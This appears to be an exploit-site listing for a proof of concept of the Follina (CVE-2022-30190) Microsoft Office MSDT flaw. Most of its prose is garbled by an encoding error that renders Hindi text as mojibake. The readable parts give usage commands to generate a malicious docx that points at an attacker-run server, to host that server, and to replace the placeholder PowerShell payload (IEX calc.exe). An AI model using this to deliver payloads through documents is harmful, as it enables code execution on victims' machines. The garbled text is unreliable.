## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SUDOAZA-CVE-2022-30190
# MS-MSDT Follina CVE-2022-30190 PoC
Microsoft Office Word рдореЗрдВ рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди (Remote Code Execution) рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг docx рдЬрдирд░реЗрдЯрд░
рдЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдирд┐рд░реНрдорд╛рдг LockedByte рджреНрд╡рд╛рд░рд╛ CVE-2021-40444 PoC рдФрд░ Tothi рджреНрд╡рд╛рд░рд╛ writeup рдкрд░ рдЖрдзрд╛рд░рд┐рдд рд╣реИред
# рдЙрдкрдпреЛрдЧ
рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ backup.html рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░реЗрдВ рдФрд░ powershell рдкреЗрд▓реЛрдб рдХреЛ рдмрджрд▓реЗрдВред рдЕрднреА рдпрд╣ рд╕рд┐рд░реНрдл `IEX('calc.exe')` рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ `calc.exe` рдЦреЛрд▓рддрд╛ рд╣реИред
`python3 exploit.py generate http://<SRV IP>`

рдПрдХ рдмрд╛рд░ рдЬрдм рдЖрдк рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг docx рдЙрддреНрдкрдиреНрди рдХрд░ рд▓реЗрдВ (рдпрд╣ `out/` рдкрд░ рд╣реЛрдЧрд╛), рдЖрдк рд╕рд░реНрд╡рд░ рд╕реЗрдЯрдЕрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
`sudo python3 exploit.py host 80`
